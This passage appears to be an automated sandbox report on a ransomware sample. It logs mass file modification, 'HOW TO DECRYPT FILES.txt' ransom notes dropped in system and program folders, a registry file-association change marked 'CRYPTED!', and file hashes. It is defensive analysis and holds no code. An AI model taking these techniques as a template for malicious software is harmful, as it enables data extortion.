File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Common Files\System\msadc\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\icon.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Person.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Java\jre7\bin\dtplugin\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Mozilla Firefox\uninstall\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR42F.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Microsoft Games\SpiderSolitaire\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winsxs\amd64_prnlx00z.inf.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5edfd7e62768255b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mmc-adm_31bf3856ad364e35_6.1.7600.16385_none_296b12551d57d47b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_prnhp003.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_0252a858dbbfc051\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-class_ss_31bf3856ad364e35_6.1.7600.16385_none_7390d7acc46c92ae\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_en-us_be19f9194580ad14\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404.htm C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..ls-nltest.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6e114d9537aeda37\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_brmfcumd.inf.resources_31bf3856ad364e35_6.1.7600.16385_de-de_257117968cd8b9fd\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_megasr.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_996f7e3998b0808b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..rojection.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_135e1933af1da298\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wcfcorecomp.resources_31bf3856ad364e35_6.1.7601.17514_es-es_a29d24bc97e24069\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\Media\Landscape\Windows Notify.wav C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-cryptui-dll.resources_31bf3856ad364e35_6.1.7601.17514_de-de_b8975dacc61ac776\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-http-api.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3e121654162b74ac\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..rofilerui.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_ef4b494552357608\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_083761eb9020e571\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\11.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\Media\Raga\Windows Pop-up Blocked.wav C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v3.0\WPF\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-videosamples_31bf3856ad364e35_6.1.7600.16385_none_51a21f033003affd\Wildlife.wmv C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-vssservice.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b5dc78d84eca21dc\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-f..rant-heap.resources_31bf3856ad364e35_6.1.7600.16385_it-it_9811e1810414cd08\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-scheduleui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a324c31e64989d11\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-imapiv2-base-mof_31bf3856ad364e35_6.1.7600.16385_none_af85c682fa6ec558\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-runas.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_3c984138d615a085\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-i..l-keyboard-00000446_31bf3856ad364e35_6.1.7600.16385_none_4fc3090ab0dcff53\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..homegroup.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ab00b852533a224a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-12.htm C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wimgapi.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_bbb0bd0d14cecc41\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Design\52873358b397c328168f0a5be7f3b9ae\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..line-tool.resources_31bf3856ad364e35_6.1.7600.16385_en-us_16fdaa9adc6724e9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_6.1.7600.16385_none_5a78515e29ea6f39\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-m..tlocation.resources_31bf3856ad364e35_6.1.7600.16385_it-it_98ea21b18ee4fb73\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..qossnapin.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8c62db6595e6b73a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_prnle003.inf.resources_31bf3856ad364e35_6.1.7600.16385_de-de_39a4cb64d041a91d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_split.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_netfx-aspnet_webadmin_help_b03f5f7f11d50a3a_6.1.7600.16385_none_50f19738760fdcfc\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.Build.Fra#\a71fda14114136e528b310f41dce7915\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_mdmnis2u.inf_31bf3856ad364e35_6.1.7600.16385_none_ed46e0a714e373a9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-d..providers.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_a1da744e8413e095\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_6.1.7600.16385_none_3b995fcfc0e586ab\headerGRADIENT_Tall.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\msil_microsoft.powershel..nsolehost.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_8ca3b331398ac02e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-u..evicehost.resources_31bf3856ad364e35_6.1.7600.16385_it-it_69b43efa2bb9b6c6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_4ac4c2430fab9a99\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-s..ion-agent.resources_31bf3856ad364e35_6.1.7600.16385_de-de_a81457131ab67d65\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\assembly\GAC_MSIL\UIAutomationTypes.resources\3.0.0.0_de_31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..-winmeetb.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_4a4444b9f6d87dbc\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\msil_system.data.services.design.resources_b77a5c561934e089_6.1.7601.17514_es-es_93c826fd0070d2ce\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\msil_system.speech.resources_31bf3856ad364e35_6.1.7601.17514_es-es_683e1eec2434de10\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-advapi32_31bf3856ad364e35_6.1.7600.16385_none_3f3d4351a032bf57\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-langreg.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8a1b676b5d7890df\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Error.wav C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..ndthemes-characters_31bf3856ad364e35_6.1.7600.16385_none_08da32b0fdad9220\Windows Logon Sound.wav C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..per-tcpip.resources_31bf3856ad364e35_6.1.7601.17514_it-it_4dfed4407fd71215\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_scripts.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-p..ooler-ppc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_51af68164268d4bf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-a..e-results.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_601f89dfb9008ef8\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ehome-ehglid.resources_31bf3856ad364e35_6.1.7600.16385_it-it_1655c33d107c8cc9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-t..cesclient.resources_31bf3856ad364e35_6.1.7601.17514_es-es_76707b86cc8768df\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization.Calendars\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-com-complus-admin_31bf3856ad364e35_6.1.7600.16385_none_43b350887adefc43\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-g..tallation.resources_31bf3856ad364e35_6.1.7600.16385_it-it_88cdcb7606a01ada\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-mobctr.resources_31bf3856ad364e35_6.1.7600.16385_it-it_f66376775fe54990\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mydocs.resources_31bf3856ad364e35_6.1.7600.16385_de-de_effd1cf37c79db0a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Bl9c98vcvv\ = "RRAHKKYNJVTSHLG" C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\ = "CRYPTED!" C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open\command C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe" C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Bl9c98vcvv C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\DefaultIcon C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe,0" C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RRAHKKYNJVTSHLG\shell C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe

"C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HOW TO DECRYPT FILES.txt

Network

N/A

Files

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

MD5 88de38daafc64c8ec113507d490c9d7d
SHA1 a51b5c3ee4c306b1a3ec68c0cfaaf41bef29e1e4
SHA256 f78cde7119f31d0e3ba5aafd8b932c342f5e762c5f8a1a3c7b115133c1f9f1ec
SHA512 3e3b42d9c2b42a24fe753dd2e24df8405edcc0c89bdba78bd4e20e5f83faa372a23008d0e7f568f4210a4935a68a1a03eebeb4e30954e5cb56542016295ddb71

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif

MD5 df04943e663f25cc1c915b6dcd28552f
SHA1 68cd5574c7e213f1ad89384d66fe673695eeaa01
SHA256 2caa4056f47fe5029b33a4bd71fd871b453a2d9a1f6bf54080bcf96a1628161e
SHA512 91848776349f491a40c3d906d60222d519a651be2e13686781ce186af0affd53cc06fb22e32d0f51e1d9dd02d1c5346cfd0c350711c2876af2412e9310102ab2

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

MD5 3ae734077b18a8ddd1d80a9500c653f0
SHA1 8e84106f2126a7a4439090b73e5407cb3883db93
SHA256 4b6ce89363b1ec7a21b6eb1dfdf614accb44bf35b98f70f477a0411ed070686b
SHA512 540a19e0f225ec44683c06488e53e679c8cc7e368a97b5c23ecdbd0abd86500c2cd37fe37c5146de37760820821c0cf856ca21c6fd79d6c3086e70917eb44d89

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

MD5 1796bbfa3b1c87c5028e6b5029f03675
SHA1 606d2d25f3ecf65951076c9de77bc6ea83e05bd5
SHA256 8f01ee0b137344ace9670b2cca619921480d87758a1a84c4b7bea3d409ccf204
SHA512 6ad2c93c9118759eea580d9243b4c1e441ffb0b1864e187f0b38b350e1034867c45f69f4b61bfa714906bb9f75c6ddd74048302da39bd68a845014a5f8f49162

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

MD5 3d241c1f6c53320365ee2f4da16648f5
SHA1 89c112fc20f7a79df5ed54524b2135aef5429ca5
SHA256 72bc9858f046fb4f2c775a548918f5dfc9c5661059bdfa9219b4b4d5c10bb79b
SHA512 e59de06b1ed25f2d7b66baf63dc41f78a9adf6f858cfae2881424e0c853f308b291da0abf3f776cfee0b5783bc6f4e4d8d9fcf46eeac4280b3a03255942db393

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 06573512904de85494f3d731b967280f
SHA1 2f4c18c5afcdcf502b7be1e2a41bce2493f3087a
SHA256 26361b8196f8d1ae24f70cb63f46b53d3072b6dcd671bc2ee965f96d1bac22b4
SHA512 a32e8dcf2059eb7b36bd57a08c6595279d5021fffbcfb6ae377d52547711dced382e82b0054136b2d9ca26b03d55b329e0241998150ad3e9372dd605c41b1792

